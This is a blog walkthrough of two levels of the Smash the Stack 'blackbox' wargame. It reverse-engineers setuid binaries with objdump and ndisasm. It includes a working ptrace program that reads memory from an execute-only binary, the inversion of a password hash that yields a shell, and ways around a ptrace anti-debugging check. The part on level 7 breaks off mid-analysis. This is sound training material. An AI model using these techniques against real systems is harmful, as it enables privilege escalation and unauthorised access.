Saturday, January 28, 2012

Blackbox - chapter 8

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Let's see what level 8 holds in store:
$ ssh -p 2225 level8@blackbox.smashthestack.org
level8@blackbox.smashthestack.org's password:
...
level8@blackbox:~$ ls -l
total 16
-rw-r--r-- 1 root   root      10 2008-01-24 05:58 password
-rws--x--x 1 level9 level9 12254 2007-12-29 14:10 secrets
Wait a minute here, what's that? We only have execution permissions for secrets.
How can we analyze it if we can't even read it?
Well, there is a way, using ptrace sorcery. I won't go into too much depth here, so I recommend you read Playing with ptrace, Part I (I'd also recommend you read part II, just for general knowledge).
Anyway, to summarize these articles, the way debuggers work is by forking, invoking ptrace with PTRACE_TRACEME in the child, and then executing the to-be-traced process. The parent process can then control the child process and read its status using other ptrace calls.
So let's write a little program that does just that, and reads the memory contents of the child process where the child process will be secrets, this is how we can cheat the permission mechanism.
level8@blackbox:/tmp$ cat > wrap.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int pid;
    char *prog[] = {"/home/level8/secrets", NULL};
    long addr;
    long size;
    int i = 0;
    int val;
    struct user_regs_struct regs;
    if (argc != 3) {
        printf("Usage: %s <address> <number of long words>\n", argv[0]);
        return 1;
    }
    addr = strtoul(argv[1], NULL, 16);
    size = strtoul(argv[2], NULL, 10);
    pid = fork();
    if (0 == pid) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(prog[0], prog, NULL);
    } else {
        wait(NULL);
        for (i = 0; i < size; ++i) {
            val = ptrace(PTRACE_PEEKTEXT, pid, addr + 4*i, NULL);
            printf("%02x", val & 0xFF);
            printf("%02x", (val >> 8) & 0xFF);
            printf("%02x", (val >> 16) & 0xFF);
            printf("%02x", (val >> 24) & 0xFF);
        }
        printf("\n");
        ptrace(PTRACE_KILL, pid, NULL, NULL);
    }
    return 0;
}

level8@blackbox:/tmp$ gcc -o wrap wrap.c
As you can see, the child just invokes ptrace with PTRACE_TRACEME and executes the level's program.
The parents waits for the child to stop, and then reads the specified amount of long words from the specified address, prints them out encoded as a hex string, and then kills the child.
Let's try out our new toy, but which address interests us? Well, the function main commonly starts at 0x08048464, as for the number of bytes we read, let's read some large amount, I'm sure main isn't too long:
level8@blackbox:/tmp$ ./wrap 0x08048464 200
5589e55381ec3404000083e4f0b80000000029c4c745f464870408c7042475870408e8cdfeffff8945f0c
785e4fbffff000000008b45f0890424e8c5feffff483985e4fbffff734781bde4fbfffffb0300007602eb
398d85e8fbffff89c3039de4fbffff8b85e4fbffff0345f08d48018b85e4fbffff0345f00fb6100fb6012
8d0045a88038d85e4fbffffff00eba58d85e8fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600c0
f804240f042188028d85e9fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600240f042188028d85e
afbffff0385e4fbffffc60000c785e4fbffff000000008d85e8fbffff890424e80bfeffff483985e4fbff
ff7205e99b0000008d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4fbffff8d85e9fbffff0
385e4fbffff0fb600320288018d85e9fbffff89c1038de4fbffff8d85e9fbffff89c20395e4fbffff8d85
e8fbffff0385e4fbffff0fb600320288018d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4f
bffff8d85e9fbffff0385e4fbffff0fb600320288018d85e4fbffff830002e949ffffff8d95e8fbffff8b
45f489442404891424e81dfdffff85c0751ac7042492870408e85dfdffffc704249b870408e811fdffffe
b0cc70424a3870408e843fdffffb8000000008b5dfcc9c3905589e5575631f65383ec0ce8a000000081c3
44120000e8a5fcffff8d9314ffffff8d8314ffffff29c2c1fa0239d6731c89d78db426000000008dbc270
0000000ff94b314ffffff4639fe72f483c40c5b5e5f5dc38db6000000008dbf000000005589e583ec0889
1c24e84200000081c3e6110000897424048d8314ffffff8d9314ffffff29d0c1f80285c08d70ff7510e85
b0000008b1c248b74240489ec5dc3ff94b314ffffff89f04e85c075f2ebe08b1c24c39090909090909090
909090905589e55383ec04bb90980408a19098040883f8ff74168d76008dbc270000000083eb04ffd08b0
383f8ff75f4585b5dc35589e553e8000000005b81c35b11000052e89afcffff8b5dfcc9c3000300000001
000200555b5b5a526357666358564d246c222300506c6561736520656e74657220796f
Now, to disassemble this I will use nasm which is not installed on the blackbox server. First I'll decode the hex string into a binary file which I will call main.bin, and then I will disassemble it at the base address of main:
~$ ndisasm -u -o 0x08048464 main.bin |cat -n|grep ret
   124 0804864E  C3                ret
   154 080486A3  C3                ret
   176 080486EF  C3                ret
   184 08048703  C3                ret
   215 0804873F  C3                ret
   226 0804875A  C3                ret
~$ ndisasm -u -o 0x08048464 main.bin | head -n 124
08048464  55                push ebp
08048465  89E5              mov ebp,esp
08048467  53                push ebx
08048468  81EC34040000      sub esp,0x434
0804846E  83E4F0            and esp,byte -0x10
08048471  B800000000        mov eax,0x0
08048476  29C4              sub esp,eax
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
080484F3  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[ebp-0x41c]
08048501  8B85E4FBFFFF      mov eax,[ebp-0x41c]
08048507  0345F0            add eax,[ebp-0x10]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
08048516  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[ebp-0x41c]
08048524  8B85E4FBFFFF      mov eax,[ebp-0x41c]
0804852A  0345F0            add eax,[ebp-0x10]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
08048536  8D85EAFBFFFF      lea eax,[ebp-0x416]
0804853C  0385E4FBFFFF      add eax,[ebp-0x41c]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
0804854F  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [ebp-0x41c],eax
08048564  7205              jc 0x804856b
08048566  E99B000000        jmp dword 0x8048606
0804856B  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[ebp-0x41c]
08048579  8D85E8FBFFFF      lea eax,[ebp-0x418]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[ebp-0x41c]
08048587  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804858D  0385E4FBFFFF      add eax,[ebp-0x41c]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485A8  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[ebp-0x41c]
080485B6  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485BC  0385E4FBFFFF      add eax,[ebp-0x41c]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485D7  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[ebp-0x41c]
080485E5  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485EB  0385E4FBFFFF      add eax,[ebp-0x41c]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
080485F8  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
08048606  8D95E8FBFFFF      lea edx,[ebp-0x418]
0804860C  8B45F4            mov eax,[ebp-0xc]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
0804861F  C7042492870408    mov dword [esp],0x8048792
08048626  E85DFDFFFF        call dword 0x8048388
0804862B  C704249B870408    mov dword [esp],0x804879b
08048632  E811FDFFFF        call dword 0x8048348
08048637  EB0C              jmp short 0x8048645
08048639  C70424A3870408    mov dword [esp],0x80487a3
08048640  E843FDFFFF        call dword 0x8048388
08048645  B800000000        mov eax,0x0
0804864A  8B5DFC            mov ebx,[ebp-0x4]
0804864D  C9                leave
0804864E  C3                ret
I hope you don't mind that we switched from the gas syntax to the intel syntax, but it's good to learn to read both.
Anyway, since we disassembled raw code, we don't have any symbolic information, so we are going to have have to guess function based on context. So let's start:
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
This loads the local variable at ebp-0xc with some constant which looks like an address in the data section. Let's use our tool again to read what's in that address.
level8@blackbox:/tmp$ ./wrap 0x08048764 10
555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377
See the 00 there? I suspect it is a string terminator, let's see what that string is:
level8@blackbox:/tmp$ python -c "print '%r' % '555b5b5a526357666358564d246c\
2223'.decode('hex')"
'U[[ZRcWfcXVM$l"#'
Odd string...seems like gibberish, we'll give ebp-0xc the name gibberish then. Let's continue, it might make more sense later:
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
This is a function call with one parameter, which also looks like an address in the data section:
level8@blackbox:/tmp$ ./wrap 0x08048775 10
506c6561736520656e74657220796f75722070617373776f72643a200057656c636f6d650a002f62
Again, I spot another string terminator, so let's decode the string:
level8@blackbox:/tmp$ python -c "print '%r' % '506c6561736520656e7465722079\
6f75722070617373776f72643a20'.decode('hex')"
'Please enter your password: '
Aha, a prompt. It also looks like the return value is stored in the stack at ebp-0x10. This means that this is not some regular printf or puts.
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
That's some sort of initialization of a variable at ebp-0x41c.
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
This executes a mystery function on whatever was stored in ebp-0x10 (the return from that prompt function), subtracts 1 from the return value and compares the result to the variable at ebp-0x41c. Sort of like this:
if (var_41c >= (func(var_10) - 1)) goto 0x80484f3
Let's call that address label1 from now on, in case we see it again.
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
This compares var_41c to the constant 0x3fb, and jumps to some new location, or to label1 if the test fails. Equivalent C code:
if (var_41c <= 0x3fb) goto 0x80484f3
else goto label1
Let's call the new address label2.
For the next piece of code, notice it starts at label2, I'll just annotate it:
label2:
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
What happens here is this, and you can verify it yourself:
var_418[var_41c] = var_10[var_41c + 1] - var_10[var_41c] + 0x5a;
var_41c++;
This tells us several things:
  1. var_41c is some sort of index, from now on we will call it idx.
  2. var_418 is some temporary buffer in the stack, we'll call it buf.
  3. var_10, which was returned from the prompt function, is a pointer to some input, most probably the user input, and the the prompt function is a prompt-and-read function. We will call it input.
At the end of that section, there's a jump to 0x8048498 which we will call label3. We've already been there, it's the piece that contained the mystery function. Let's rewrite it, but with more meaningful names and see if it sheds some new light:
if (idx >= (func(input) - 1)) goto label1
else if (idx <= 0x3fb) goto label2
else goto label1
I think we can spots what's happening here, mystery function func is actually strlen, and this is part of a while statement:
while ((idx < strlen(input)) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}
/* do label1 stuff */
OK, let's see what happens at label1 (I'm going to start annotating the code with variable names):
label1:
080484F3  8D85E8FBFFFF      lea eax,[buf]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[idx]
08048501  8B85E4FBFFFF      mov eax,[idx]
08048507  0345F0            add eax,[input]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
This translates to:
buf[idx] = 0x21 + (input[idx] >> 4) & 0xf;
The next chunk:
08048516  8D85E9FBFFFF      lea eax,[buf+1]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[idx]
08048524  8B85E4FBFFFF      mov eax,[idx]
0804852A  0345F0            add eax,[input]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
Which translates to:
buf[idx + 1] = 0x21 + input[idx] & 0xf;
Next we have:
08048536  8D85EAFBFFFF      lea eax,[buf+2]
0804853C  0385E4FBFFFF      add eax,[idx]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [idx],0x0
         -0000
This is equivalent to:
buf[idx + 2] = 0;
idx = 0;
This looks like something string-like was terminated, and the index was reset, probably for a second pass. Let's see what happens next:
0804854F  8D85E8FBFFFF      lea eax,[buf]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368 [strlen]
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [idx],eax
08048564  7205              jc 0x804856b [label4]
08048566  E99B000000        jmp dword 0x8048606 [label5]
Translated to C:
if (idx < strlen(buf) - 1) goto label4;
else goto label5;
The next piece of code starts at label4, and has a repeating pattern, so I'll paste it all at once:
label4:
0804856B  8D85E8FBFFFF      lea eax,[buf]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[idx]
08048579  8D85E8FBFFFF      lea eax,[buf]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[idx]
08048587  8D85E9FBFFFF      lea eax,[buf+1]
0804858D  0385E4FBFFFF      add eax,[idx]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[buf+1]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[idx]
080485A8  8D85E9FBFFFF      lea eax,[buf+1]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[idx]
080485B6  8D85E8FBFFFF      lea eax,[buf]
080485BC  0385E4FBFFFF      add eax,[idx]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[buf]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[idx]
080485D7  8D85E8FBFFFF      lea eax,[buf]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[idx]
080485E5  8D85E9FBFFFF      lea eax,[buf+1]
080485EB  0385E4FBFFFF      add eax,[idx]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
Which is:
buf[idx] = buf[idx] ^ buf[idx + 1];
buf[idx + 1] = buf[idx] ^ buf[idx + 1];
buf[idx] = buf[idx] ^ buf[idx + 1];
That's just the code for swapping bytes.
Next we have:
080485F8  8D85E4FBFFFF      lea eax,[idx]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
Which increments the index by 2 and then jumps back to the index comparison, which makes it look like another loop:
for (idx = 0; i < strlen(buf) - 1; i += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}
Next is the code that gets executed when the loop is exhausted:
label5:
08048606  8D95E8FBFFFF      lea edx,[buf]
0804860C  8B45F4            mov eax,[gibberish]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
I think by this time you figured out what's happening here, gibberish is a password hash, and the the program did so far is to hash the input password, and this is where they get compared.
I won't continue analyzing the code anymore, because that's enough. Let's combine all the little pieces of C code and see what we can do:
while ((idx < strlen(input)) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}

buf[idx] = 0x21 + (input[idx] >> 4) & 0xf;
buf[idx + 1] = 0x21 + input[idx] & 0xf;
buf[idx + 2] = 0;

for (idx = 0; i < strlen(buf) - 1; i += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}
Well, we know the hash, and we know the hashed password. We can now perform an inverse hash and obtain the original password.
That should be easy, working backwards:
  1. Unswap every two consecutive bytes in the hash.
  2. Take the last two bytes, subtract 0x21 from them, and recombine them to a single byte, one being the high nibble, and the other the low nibble. Now we know input[N]
  3. Reversing the formula for buf inside the while we can obtain a regression formula for the input: input[i] = input[i + 1] - buf[i] + 0x5a.
I think I'll leave it to you to write a script and obtain the password yourselves.
I'll check check if it works:
level8@blackbox:~$ ./secrets
Please enter your password: 
Welcome
sh-3.1$
Just one last level to go ;)

Blackbox - chapter 7

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Level 7. There we go again:
$ ssh -p 2225 level7@blackbox.smashthestack.org
level7@blackbox.smashthestack.org's password:
...
level7@blackbox:~$ ls -l
total 12
-rwsr-xr-x 1 level8 level8 7851 2008-04-21 18:26 heybabe
-rw-r--r-- 1 root   level7   10 2008-01-24 05:56 passwd
No source, so like the previous time, let's start with dumping the data:
level7@blackbox:~$ objdump -s --section=.rodata heybabe

heybabe:     file format elf32-i386

Contents of section .rodata:
 80486b0 03000000 01000200 75736167 653a2025  ........usage: %
 80486c0 73203c61 72673e0a 00000000 54726163  s <arg>.....Trac
 80486d0 696e6720 64657465 63746564 203a2920  ing detected :) 
 80486e0 736f7272 79202e2e 2e2e2e00 544f5547  sorry ......TOUG
 80486f0 48205348 49542100 57616c6b 20746865  H SHIT!.Walk the
 8048700 20776179 206f6620 74686520 31333337   way of the 1337
 8048710 206f6e65 2100                         one!.
As before, I've colored the strings, and made a summary:
80486b8: usage : %s <arg>\n
80486cc: Tracing detected :) sorry .....
80486ec: TOUGH SHIT!
80486f8: Walk the way of the 1337 one!
Now we'll disassemble main:
level7@blackbox:~$ objdump -d heybabe|grep -A80 "<main>:"
08048464 <main>:
 8048464: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048468: 83 e4 f0              and    $0xfffffff0,%esp
 804846b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804846e: 55                    push   %ebp
 804846f: 89 e5                 mov    %esp,%ebp
 8048471: 57                    push   %edi
 8048472: 51                    push   %ecx
 8048473: 81 ec 10 04 00 00     sub    $0x410,%esp
 8048479: 89 8d 04 fc ff ff     mov    %ecx,0xfffffc04(%ebp)
 804847f: 8b 85 04 fc ff ff     mov    0xfffffc04(%ebp),%eax
 8048485: 83 38 02              cmpl   $0x2,(%eax)
 8048488: 74 27                 je     80484b1 <main+0x4d>
 804848a: 8b 95 04 fc ff ff     mov    0xfffffc04(%ebp),%edx
 8048490: 8b 42 04              mov    0x4(%edx),%eax
 8048493: 8b 00                 mov    (%eax),%eax
 8048495: 89 44 24 04           mov    %eax,0x4(%esp)
 8048499: c7 04 24 b8 86 04 08  movl   $0x80486b8,(%esp)
 80484a0: e8 cf fe ff ff        call   8048374 <printf@plt>
 80484a5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ac: e8 d3 fe ff ff        call   8048384 <exit@plt>
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret
The first few lines, up to the cmpl &amp; je should be familiar (if not, see the previous chapter for a detailed description) and mean first, that the address to the arguments is stored at ebp-0x3fc, and second, that the program expects exactly one argument.

The next lines are somewhat more tricky and important to this level:
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
The called function is ptrace, and it is called with the following parameters: ptrace(0, 0, 1, 0). Then the return value is tested to be 0, and a jump is performed accordingly.
Now, what is this ptrace, what are the arguments, and why is it crucial for this level.
Well, ptrace is a system call, and we can find some documentation about it in the man pages (cropped for brevity and relevance, you can find the full man-pages by invoking man ptrace):
PTRACE(2)                 Linux Programmer's Manual                 PTRACE(2)

NAME
       ptrace - process trace

SYNOPSIS
       #include 

       long ptrace(enum __ptrace_request request, pid_t pid,
                   void *addr, void *data);

DESCRIPTION
       The  ptrace()  system  call provides a means by which a parent process
       may observe and control the execution of another process, and  examine
       and  change  its  core  image  and registers.  It is primarily used to
       implement breakpoint debugging and system call tracing.

       The parent can initiate a trace by  calling  fork(2)  and  having  the
       resulting  child  do  a  PTRACE_TRACEME,  followed  (typically)  by an
       exec(3).  Alternatively, the parent may commence trace of an  existing
       process using PTRACE_ATTACH.  (See additional notes below.)
...
       The value of request determines the action to be performed:

       PTRACE_TRACEME
              Indicates that this process is to be traced by its parent.  Any
              signal (except SIGKILL) delivered to this process will cause it
              to  stop  and its parent to be notified via wait(2).  Also, all
              subsequent calls to execve(2) by this process will cause a SIG‐
              TRAP  to be sent to it, giving the parent a chance to gain con‐
              trol before the new program begins execution.  A process proba‐
              bly  shouldn't  make this request if its parent isn't expecting
              to trace it.  (pid, addr, and data are ignored.)

       The above request is used only by the child process; the rest are used
       only  by  the  parent.   In  the following requests, pid specifies the
       child process to be acted on.  For requests  other  than  PTRACE_KILL,
       the child process must be stopped.
...
RETURN VALUE
       On  success,  PTRACE_PEEK*  requests  return the requested data, while
       other requests return zero.  On error, all  requests  return  -1,  and
       errno  is set appropriately.  Since the value returned by a successful
       PTRACE_PEEK* request may be -1, the caller must check errno after such
       requests to determine whether or not an error occurred.
...
OK, what can we learn from the man pages:
  1. The ptrace system-call receives 4 parameters: a request code, a pid, an address pointer and a data pointer.
  2. The request code used in our case is 0, which corresponds to PTRACE_TRACEME. What this request does is make the process behave in a traceable fashion, which involves, among other things, making it stop before any call to execve. Also, all the rest of the arguments are ignored.
  3. The function returns -1 on failure.
So, in our case, ptrace fails, it will return -1, trigger the sign flag, which means that the jump branch will not be taken and we go to:
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
That's just an error print and an exit.
When will it fail? Well, if the process is already marked as being traced, then ptrace will fail, it will happen if we try to debug the program by running it in gdb. This can be averted by setting a breakpoint before the test instruction and changing the value of eax so that the test will pass. This is not important for this level, but it's good to know.
The real important thing is, that since the process is in trace mode, we can't execute a shellcode that has an execve system call in it.
Bear that in mind as we continue to analyze the program.
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
